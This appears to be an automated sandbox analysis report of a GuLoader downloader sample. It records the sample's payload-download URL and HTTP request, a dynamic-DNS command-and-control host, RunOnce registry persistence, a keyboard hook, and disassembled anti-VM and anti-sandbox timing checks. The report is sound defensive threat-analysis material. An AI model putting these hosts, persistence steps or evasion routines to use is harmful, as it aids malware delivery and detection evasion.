Windows Analysis Report JXblq0dqPN.exe

Overview

General Information

Sample Name: JXblq0dqPN.exe
Analysis ID: 458740
MD5: 8718d75b7cac53f13d01ddea9b52cee0
SHA1: 2a37a01df74c887bb52eb2762d7d6ae0bd5e6b0b
SHA256: 6f40242247db00eea1922d0c2a38337ddea49d9da02693679d2e4bfb19e6c088
Tags: exeGuLoader
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe ReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted file
Source: JXblq0dqPN.exe Virustotal: Detection: 35% Perma Link
Source: JXblq0dqPN.exe ReversingLabs: Detection: 17%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: JXblq0dqPN.exe Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: JXblq0dqPN.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
Uses dynamic DNS services
Source: unknown DNS query: name: wealthyrem.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49746 -> 194.5.97.128:39200
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: global traffic HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: clientconfig.passport.net
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a global keyboard hook
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\JXblq0dqPN.exe Jump to behavior
Creates a DirectInput object (often for capturing keystrokes)
Source: JXblq0dqPN.exe, 00000001.00000002.387805653.00000000007CA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02261C35 NtWriteVirtualMemory, 1_2_02261C35
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267012 NtWriteVirtualMemory,GetLongPathNameW, 1_2_02267012
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226904A NtProtectVirtualMemory, 1_2_0226904A
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022658B5 NtAllocateVirtualMemory, 1_2_022658B5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226483C NtWriteVirtualMemory, 1_2_0226483C
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264A0A NtWriteVirtualMemory, 1_2_02264A0A
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264C62 NtWriteVirtualMemory, 1_2_02264C62
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022646B5 NtWriteVirtualMemory, 1_2_022646B5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022642BF NtWriteVirtualMemory, 1_2_022642BF
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226473E NtWriteVirtualMemory, 1_2_0226473E
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02265983 NtAllocateVirtualMemory, 1_2_02265983
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264BEB NtWriteVirtualMemory, 1_2_02264BEB
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02268FFF NtProtectVirtualMemory, 1_2_02268FFF
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264BC5 NtWriteVirtualMemory, 1_2_02264BC5
Detected potential crypto function
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02261C35 1_2_02261C35
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267012 1_2_02267012
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022658B5 1_2_022658B5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022624E2 1_2_022624E2
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022620EC 1_2_022620EC
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226950D 1_2_0226950D
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260557 1_2_02260557
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022685F4 1_2_022685F4
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260BF8 1_2_02260BF8
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260223 1_2_02260223
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226483C 1_2_0226483C
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264A0A 1_2_02264A0A
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264214 1_2_02264214
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264C62 1_2_02264C62
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02266475 1_2_02266475
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260647 1_2_02260647
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260641 1_2_02260641
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226885F 1_2_0226885F
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022646B5 1_2_022646B5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022614B3 1_2_022614B3
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022642BF 1_2_022642BF
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022626BA 1_2_022626BA
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02263896 1_2_02263896
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267E98 1_2_02267E98
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022628E2 1_2_022628E2
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022680FC 1_2_022680FC
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02265CD0 1_2_02265CD0
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02262D2C 1_2_02262D2C
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226473E 1_2_0226473E
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260D0E 1_2_02260D0E
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260708 1_2_02260708
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226951E 1_2_0226951E
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226111B 1_2_0226111B
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02268764 1_2_02268764
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02263D6D 1_2_02263D6D
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267776 1_2_02267776
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260B71 1_2_02260B71
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02262F7B 1_2_02262F7B
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02263147 1_2_02263147
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02262F54 1_2_02262F54
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022615A5 1_2_022615A5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02263FA3 1_2_02263FA3
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267FAE 1_2_02267FAE
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02265D82 1_2_02265D82
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226218A 1_2_0226218A
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267BEC 1_2_02267BEC
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264BEB 1_2_02264BEB
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264BC5 1_2_02264BC5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022637C8 1_2_022637C8
PE file contains strange resources
Source: JXblq0dqPN.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: JXblq0dqPN.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ANNONCEKAMPAGNE.exe.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ANNONCEKAMPAGNE.exe.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: JXblq0dqPN.exe, 00000001.00000000.229744008.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe
Source: JXblq0dqPN.exe, 00000001.00000002.387697389.0000000000770000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs JXblq0dqPN.exe
Source: JXblq0dqPN.exe, 00000011.00000002.1310162102.0000000002400000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs JXblq0dqPN.exe
Source: JXblq0dqPN.exe, 00000011.00000000.386257006.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe
Source: JXblq0dqPN.exe Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe
Uses 32bit PE files
Source: JXblq0dqPN.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/3@164/3
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File created: C:\Users\user\AppData\Roaming\remcos Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File created: C:\Users\user~1\AppData\Local\Temp\~DF27FD92C68F09D524.TMP Jump to behavior
Source: JXblq0dqPN.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: JXblq0dqPN.exe Virustotal: Detection: 35%
Source: JXblq0dqPN.exe ReversingLabs: Detection: 17%
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File read: C:\Users\user\Desktop\JXblq0dqPN.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe'
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe'
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe' Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_00401367 pushfd ; iretd 1_2_0040136A
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_00403268 pushfd ; iretd 1_2_0040326E
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226A0E4 push FFFFFFD2h; iretd 1_2_0226A0E9
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 17_2_0056A0E4 push FFFFFFD2h; iretd 17_2_0056A0E9
Source: initial sample Static PE information: section name: .text entropy: 7.08584386702
Source: initial sample Static PE information: section name: .text entropy: 7.08584386702

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File created: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe Jump to dropped file

Boot Survival:

barindex
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02261C35 NtWriteVirtualMemory, 1_2_02261C35
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267012 NtWriteVirtualMemory,GetLongPathNameW, 1_2_02267012
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022685F4 LoadLibraryA, 1_2_022685F4
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260BF8 TerminateProcess,LoadLibraryA, 1_2_02260BF8
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022642BF NtWriteVirtualMemory, 1_2_022642BF
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002267485 second address: 0000000002267485 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 00000000022662D6 second address: 00000000022662D6 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002264EA5 second address: 0000000002264EA5 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\ANNONCEKAMPAGNE.EXE\ROGUYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEOTATE
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp, JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\ANNONCEKAMPAGNE.EXE\ROGUYSET W = CREATEOBJECT("WSCRIPT.SHELL")
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002267485 second address: 0000000002267485 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 00000000022698AE second address: 0000000002269A11 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 pop eax 0x00000004 call 00007F7648A60838h 0x00000009 mov bl, byte ptr [eax] 0x0000000b test ebx, eax 0x0000000d mov byte ptr [ebp+000001EFh], FFFFFFCFh 0x00000014 xor byte ptr [ebp+000001EFh], 00000064h 0x0000001b xor byte ptr [ebp+000001EFh], 00000049h 0x00000022 sub byte ptr [ebp+000001EFh], 00000016h 0x00000029 cmp bl, byte ptr [ebp+000001EFh] 0x0000002f je 00007F7648A607CBh 0x00000031 mov bx, word ptr [eax] 0x00000034 cmp eax, edx 0x00000036 test edi, 0B419DFAh 0x0000003c mov word ptr [ebp+00000218h], si 0x00000043 mov si, 2562h 0x00000047 jmp 00007F7648A608E5h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002267E2C second address: 0000000002267E2C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F567E6A1h 0x00000013 xor eax, 7B1C69AEh 0x00000018 xor eax, 278FAC68h 0x0000001d xor eax, A9F42366h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F764878D3EDh 0x0000002e cmp bh, dh 0x00000030 popad 0x00000031 call 00007F764878CF02h 0x00000036 lfence 0x00000039 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 00000000022662D6 second address: 00000000022662D6 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002264561 second address: 0000000002269606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov edx, dword ptr [ebp+0000027Ah] 0x00000009 push 64FFFEF9h 0x0000000e add dword ptr [esp], 9B136642h 0x00000015 xor dword ptr [esp], 8588ACC3h 0x0000001c xor dword ptr [esp], 859BC9F8h 0x00000023 cmp cx, cx 0x00000026 push dword ptr [ebp+50h] 0x00000029 call 00007F7648791C6Eh 0x0000002e call 00007F764878CCF5h 0x00000033 pop ebx 0x00000034 sub ebx, 05h 0x00000037 mov dword ptr [ebp+0000014Ch], edi 0x0000003d jmp 00007F764878CDD9h 0x00000042 pushad 0x00000043 mov esi, 00000069h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002264936 second address: 0000000002269606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+0000010Ch], 00000000h 0x0000000d mov eax, ebp 0x0000000f add eax, 0000010Ch 0x00000014 mov dword ptr [ebp+0000021Ch], edi 0x0000001a mov edi, eax 0x0000001c push edi 0x0000001d mov edi, dword ptr [ebp+0000021Ch] 0x00000023 push dword ptr [ebp+000000FCh] 0x00000029 call 00007F7648A653A9h 0x0000002e call 00007F7648A60805h 0x00000033 pop ebx 0x00000034 sub ebx, 05h 0x00000037 mov dword ptr [ebp+0000014Ch], edi 0x0000003d jmp 00007F7648A608E9h 0x00000042 pushad 0x00000043 mov esi, 00000069h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002264EA5 second address: 0000000002264EA5 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 00000000005698AE second address: 0000000000569A11 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 pop eax 0x00000004 call 00007F7648A60838h 0x00000009 mov bl, byte ptr [eax] 0x0000000b test ebx, eax 0x0000000d mov byte ptr [ebp+000001EFh], FFFFFFCFh 0x00000014 xor byte ptr [ebp+000001EFh], 00000064h 0x0000001b xor byte ptr [ebp+000001EFh], 00000049h 0x00000022 sub byte ptr [ebp+000001EFh], 00000016h 0x00000029 cmp bl, byte ptr [ebp+000001EFh] 0x0000002f je 00007F7648A607CBh 0x00000031 mov bx, word ptr [eax] 0x00000034 cmp eax, edx 0x00000036 test edi, 0B419DFAh 0x0000003c mov word ptr [ebp+00000218h], si 0x00000043 mov si, 2562h 0x00000047 jmp 00007F7648A608E5h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc
